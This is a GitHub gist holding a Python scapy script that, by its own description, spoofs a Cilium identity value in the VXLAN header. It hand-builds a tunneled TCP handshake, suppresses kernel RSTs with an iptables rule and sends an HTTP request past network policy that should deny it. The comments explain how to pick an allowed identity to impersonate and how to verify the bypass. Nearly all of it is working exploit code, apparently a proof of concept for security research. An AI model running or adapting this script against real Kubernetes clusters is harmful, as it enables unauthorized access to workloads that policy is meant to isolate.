Created
December 31, 2020 11:51
-
-
Save nyrahul/ef619c4b04dd2afb45b42d51ae6b00ef to your computer and use it in GitHub Desktop.
Spoofing Cilium identity value in vxlan tunneled mode
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /usr/bin/env python | |
# Aim of this script is to send a vxlan tunneled HTTP request with spoofed | |
# identity and pass through the authz checks implemented in cilium-ebpf. | |
# Configuration you need to set correct: | |
# 1. The target pod address (dip, dport) to which you want to make unauthorized access | |
# 2. The source identity (identity = 8849 below) to spoof. Use `cilium identity | |
# list` to check valid identity values. | |
# 3. The target node's vxlan IP address (vxlan_ip) and port (vxlan_port = 8472 | |
# def used by cilium). | |
# How to figure out unauth access is done i.e, validating spoofed identity works? | |
# You will receive successful HTTP response from the spoof application even | |
# though the policy says deny all except specific identity (this identity I | |
# spoof through this app). | |
# You can use `hubble observe` to monitor the policy verdicts | |
# You can check `tcpdump` to check packet flows. | |
# Note that you need to drop the RST sent from your kernel. Kernel sends a TCP | |
# RST for unknown SYN-ACK rcvd from the remote. Kernel does not know of any | |
# known TCP session to which this SYN-ACK belongs since the scapy uses RAW | |
# sockets to send the SYN. The add_iptable_rule()/rem_iptable_rule handles this | |
# drop operation. | |
from scapy.all import * | |
from time import sleep | |
import random | |
import atexit | |
import os | |
iptrule = None | |
@atexit.register | |
def rem_iptable_rule(): | |
global iptrule | |
if iptrule != None: | |
os.system("iptables -D " + iptrule) # Delete the iptable rule | |
def add_iptable_rule(sport, dport): | |
global iptrule | |
if iptrule != None: | |
print("Iptables rule is already added.") | |
return | |
iptrule = " OUTPUT -p tcp --tcp-flags RST RST --sport " + str(sport) + " --dport " + str(dport) + " -j DROP" | |
os.system("iptables -A " + iptrule) # Apply the iptable rule | |
# Add vxlan encapsulation and send the pkt | |
# use VXLAN_DISABLE=1 env var to disable adding encap hdr | |
def vxlan_send(pkt): | |
vxlan_disable = os.getenv('VXLAN_DISABLE') | |
if vxlan_disable != None and vxlan_disable != "0": | |
return send(pkt) | |
vxlan_ip = "192.168.33.11" | |
vxlan_port = 8472 | |
identity = 8849 # Sent in vxlan VNI field as expected by cilium .. use `cilium identity list` to check which identities are allowed and spoof that identity | |
tpkt = IP(dst=vxlan_ip)/UDP(dport=vxlan_port)/VXLAN(vni=identity)/pkt # Encapsulate the input pkt with vxlan | |
return send(tpkt) | |
def send_http_req(): | |
dport = 80 # destination port | |
sip = "10.11.1.44" | |
dip = "10.11.0.16" # Set your pod's IP address here | |
payload = 'POST /v1/request-landing HTTP/1.1\r\nHost: ' + dip + '\r\n\r\n' # packet payload | |
seq = random.randint(2,pow(2,24)) # Generate random initial TCP seq num | |
sport = random.randint(10000,60000) # Generate random source port within upper uint16_t range | |
add_iptable_rule(sport, dport) # Add iptables rule to drop the RST | |
syn = IP(src=sip, dst=dip) / TCP(dport=dport, sport=sport, flags='S', seq=seq) | |
vxlan_send(syn) | |
syn_ack = sr1(syn) # Receive TCP SYN-ACK | |
pcapfilter = "udp and dst port 8472" | |
pkts = sniff(iface=get_if_list(), filter=pcapfilter, prn=lambda p: p.summary(), count=1) | |
req = IP(src=syn_ack[IP].dst, dst=syn_ack[IP].src) / \ | |
TCP(dport=dport, sport=syn_ack[IP].dport, seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq + 1, flags='A') / \ | |
payload | |
req.show2() | |
vxlan_send(req) | |
pkts = sniff(filter="tcp and src host " + syn_ack[IP].src, count=3) # wait for TCP packets from the dip | |
pkts.nsummary() | |
# usually secdev.org responds with a TCP ACK pkt first and then with a | |
# HTTP-200 OK. Thus the first packet needs to be dropped. | |
for rsp in pkts: | |
if rsp[IP].len > 50: # Any IP pkt with len>50 will be a HTTP response | |
rsp.show() # show the HTTP response | |
break | |
send_http_req() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment